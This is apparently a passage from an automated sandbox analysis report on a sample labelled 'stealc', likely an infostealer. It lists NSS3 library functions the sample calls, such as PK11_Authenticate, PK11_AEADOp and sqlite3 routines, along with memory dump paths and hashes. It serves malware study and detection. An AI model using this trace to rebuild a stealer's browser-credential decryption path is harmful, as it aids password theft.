                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C89BE03
                                                                                                                                                                              • Part of subcall function 6C8EFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C8E8D2D,?,00000000,?), ref: 6C8EFB85
                                                                                                                                                                              • Part of subcall function 6C8EFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C8EFBB1
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C89BE22
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C89BE30
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C89BE3B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1821307800-0
                                                                                                                                                                            • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                            • Instruction ID: 9edad98bc6b2169b04a4ec749ea6054a6805dee8d8ac59c77da9c8c6682512c0
                                                                                                                                                                            • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                            • Instruction Fuzzy Hash: EC012BA9A4021176F630226E7E01F7F364C4FA168DF140530EE18D6BC2FB51D51982B6
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C921C74
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6C921C92
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C921C99
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6C921CCB
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C921CD2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3805613680-0
                                                                                                                                                                            • Opcode ID: f47516f9e5c43bf0f39644f2b11a2c7b35770cba237cc76e67966a608fda4a79
                                                                                                                                                                            • Instruction ID: 33dcf1546fcc790c30b6e17948312d253a619eb47384c9a0175450a7aefa0505
                                                                                                                                                                            • Opcode Fuzzy Hash: f47516f9e5c43bf0f39644f2b11a2c7b35770cba237cc76e67966a608fda4a79
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F01D6B5F2DAB05FEF10EFA4AD0D7453B786B1B308F200125E559A2A40D736D5248796
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6C883D77,?,?,6C884E1D), ref: 6C981C8A
                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6C981CB6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                            • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                                                                                                            • API String ID: 1840970956-3705377941
                                                                                                                                                                            • Opcode ID: a96e0cd150ff491341e904989710517e25495ce4707eb256c45fc4c1e3b50bd3
                                                                                                                                                                            • Instruction ID: 161cddff0256acebee32a55e42029731c73e675f6a70764f3fc9ad3fc7c58b79
                                                                                                                                                                            • Opcode Fuzzy Hash: a96e0cd150ff491341e904989710517e25495ce4707eb256c45fc4c1e3b50bd3
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B0124B1B002404BD710AB2CD8029B277E5EF8234CB14487DE8488BB02EB22E866C752
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C933046
                                                                                                                                                                              • Part of subcall function 6C91EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C91EE85
                                                                                                                                                                            • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C907FFB), ref: 6C93312A
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C933154
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C932E8B
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                              • Part of subcall function 6C91F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C909BFF,?,00000000,00000000), ref: 6C91F134
                                                                                                                                                                            • memcpy.VCRUNTIME140(8B3C75C0,?,6C907FFA), ref: 6C932EA4
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C93317B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Error$memcpy$K11_Value
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2334702667-0
                                                                                                                                                                            • Opcode ID: f0862282aea2f5f16bab4164cde58b578e1c1bc46664999c3d6bde1125009872
                                                                                                                                                                            • Instruction ID: 447c57823ccea5d49ab98e54ccb14cd5778cfb5780b7d61364706ec00e56459b
                                                                                                                                                                            • Opcode Fuzzy Hash: f0862282aea2f5f16bab4164cde58b578e1c1bc46664999c3d6bde1125009872
                                                                                                                                                                            • Instruction Fuzzy Hash: D0A1CD75A002289FDB24CF54CC80BAAB7B5EF49308F048199E94D6B741E731EE95CF91
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C8FED6B
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6C8FEDCE
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15
                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,6C8FB04F), ref: 6C8FEE46
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C8FEECA
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C8FEEEA
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C8FEEFB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3768380896-0
                                                                                                                                                                            • Opcode ID: d1df15ac23019ad54fe4e276eccd755ba916121b51138cc23d5bebc8378e4584
                                                                                                                                                                            • Instruction ID: 6a6d9a99c5e65ab675aebee4c45e7398dadbcb9ffea9291eafebba8da181541c
                                                                                                                                                                            • Opcode Fuzzy Hash: d1df15ac23019ad54fe4e276eccd755ba916121b51138cc23d5bebc8378e4584
                                                                                                                                                                            • Instruction Fuzzy Hash: 148171B5A002059FEB24CF59DE80B6B77F5FF88388F144828E92597B51D731E816CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8FC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C8FDAE2,?), ref: 6C8FC6C2
                                                                                                                                                                            • PR_Now.NSS3 ref: 6C8FCD35
                                                                                                                                                                              • Part of subcall function 6C959DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DC6
                                                                                                                                                                              • Part of subcall function 6C959DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DD1
                                                                                                                                                                              • Part of subcall function 6C959DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C959DED
                                                                                                                                                                              • Part of subcall function 6C8E6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C891C6F,00000000,00000004,?,?), ref: 6C8E6C3F
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C8FCD54
                                                                                                                                                                              • Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07
                                                                                                                                                                              • Part of subcall function 6C8E7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C891CCC,00000000,00000000,?,?), ref: 6C8E729F
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8FCD9B
                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C8FCE0B
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C8FCE2C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C8FCE40
                                                                                                                                                                              • Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
                                                                                                                                                                              • Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
                                                                                                                                                                              • Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D
                                                                                                                                                                              • Part of subcall function 6C8FCEE0: PORT_ArenaMark_Util.NSS3(?,6C8FCD93,?), ref: 6C8FCEEE
                                                                                                                                                                              • Part of subcall function 6C8FCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C8FCD93,?), ref: 6C8FCEFC
                                                                                                                                                                              • Part of subcall function 6C8FCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C8FCD93,?), ref: 6C8FCF0B
                                                                                                                                                                              • Part of subcall function 6C8FCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C8FCD93,?), ref: 6C8FCF1D
                                                                                                                                                                              • Part of subcall function 6C8FCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF47
                                                                                                                                                                              • Part of subcall function 6C8FCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF67
                                                                                                                                                                              • Part of subcall function 6C8FCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C8FCD93,?,?,?,?,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF78
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3748922049-0
                                                                                                                                                                            • Opcode ID: 00e5c3c96a91cbf653e7832a75408e27d127fed4c75e16b62cb27d48d19eb25f
                                                                                                                                                                            • Instruction ID: 7bef70c64863da30a5fc37b0b4f60cb0b92680d7cd07f0087f846ca0cd3bcc3b
                                                                                                                                                                            • Opcode Fuzzy Hash: 00e5c3c96a91cbf653e7832a75408e27d127fed4c75e16b62cb27d48d19eb25f
                                                                                                                                                                            • Instruction Fuzzy Hash: D351C5B6E001049BE730EF69DD40B9A77F4AF58388F250934D965DB742EB31EA06CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C8CEF38
                                                                                                                                                                              • Part of subcall function 6C8B9520: PK11_IsLoggedIn.NSS3(00000000,?,6C8E379E,?,00000001,?), ref: 6C8B9542
                                                                                                                                                                            • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C8CEF53
                                                                                                                                                                              • Part of subcall function 6C8D4C20: TlsGetValue.KERNEL32 ref: 6C8D4C4C
                                                                                                                                                                              • Part of subcall function 6C8D4C20: EnterCriticalSection.KERNEL32(?), ref: 6C8D4C60
                                                                                                                                                                              • Part of subcall function 6C8D4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CA1
                                                                                                                                                                              • Part of subcall function 6C8D4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CBE
                                                                                                                                                                              • Part of subcall function 6C8D4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CD2
                                                                                                                                                                              • Part of subcall function 6C8D4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4D3A
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C8CEF9E
                                                                                                                                                                              • Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8CEFC3
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C8CF016
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8CF022
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2459274275-0
                                                                                                                                                                            • Opcode ID: e27a5ab89be47220161fa040af57bf0009b1c3f2f9495f2fe75e575a47ad151f
                                                                                                                                                                            • Instruction ID: 6c74a26d47ab184f438b42b66e754e4f1cb8a67ba9b3e49fea2d977536723379
                                                                                                                                                                            • Opcode Fuzzy Hash: e27a5ab89be47220161fa040af57bf0009b1c3f2f9495f2fe75e575a47ad151f
                                                                                                                                                                            • Instruction Fuzzy Hash: 7141B0B1E00209ABEF118FA9DD85BEE7BB9AF58358F004425F914A6350E771C9158BA2
                                                                                                                                                                            APIs
                                                                                                                                                                            • CERT_DecodeAVAValue.NSS3(?,?,6C890A2C), ref: 6C890E0F
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C890A2C), ref: 6C890E73
                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C890A2C), ref: 6C890E85
                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C890A2C), ref: 6C890E90
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C890EC4
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C890A2C), ref: 6C890ED9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3618544408-0
                                                                                                                                                                            • Opcode ID: 1b3d20eda8b9ce3b75823084fd996779c6b7da3fe704233c7f4b44a5bd06d251
                                                                                                                                                                            • Instruction ID: aca05be2cbff700092147658e70c294d82e50f481022e5e089622c158d932aad
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b3d20eda8b9ce3b75823084fd996779c6b7da3fe704233c7f4b44a5bd06d251
                                                                                                                                                                            • Instruction Fuzzy Hash: E3213EB2E002885BEF30496D9E85B6F76AEDFD9748F190C35D81C97A02EB60C81582A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C91EE85
                                                                                                                                                                            • realloc.MOZGLUE(55252F9C,?), ref: 6C91EEAE
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6C91EEC5
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15
                                                                                                                                                                            • htonl.WSOCK32(?), ref: 6C91EEE3
                                                                                                                                                                            • htonl.WSOCK32(00000000,?), ref: 6C91EEED
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C91EF01
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1351805024-0
                                                                                                                                                                            • Opcode ID: 936afd98ba49b40c09adb3d468adbd2885f5d84b4177d248eab6b7e2b2f6d681
                                                                                                                                                                            • Instruction ID: 47f5c88ad3d4b9051141e18a8547f650564bd544b0e59465bf021db3f8845be0
                                                                                                                                                                            • Opcode Fuzzy Hash: 936afd98ba49b40c09adb3d468adbd2885f5d84b4177d248eab6b7e2b2f6d681
                                                                                                                                                                            • Instruction Fuzzy Hash: 6E21E731A042289FCF109F28DC85B5A77A8EF49758F148129EC199BF41D730EC15CBE6
                                                                                                                                                                            APIs
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C8E5D71), ref: 6C8E5F0A
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8E5F1F
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(89000904), ref: 6C8E5F2F
                                                                                                                                                                            • PR_Unlock.NSS3(890008E8), ref: 6C8E5F55
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8E5F6D
                                                                                                                                                                            • SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C8E5F7D
                                                                                                                                                                              • Part of subcall function 6C8E5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C8E5F82,8B4274C0), ref: 6C8E5248
                                                                                                                                                                              • Part of subcall function 6C8E5220: EnterCriticalSection.KERNEL32(0F6C9B0D,?,6C8E5F82,8B4274C0), ref: 6C8E525C
                                                                                                                                                                              • Part of subcall function 6C8E5220: PR_SetError.NSS3(00000000,00000000), ref: 6C8E528E
                                                                                                                                                                              • Part of subcall function 6C8E5220: PR_Unlock.NSS3(0F6C9AF1), ref: 6C8E5299
                                                                                                                                                                              • Part of subcall function 6C8E5220: free.MOZGLUE(00000000), ref: 6C8E52A9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
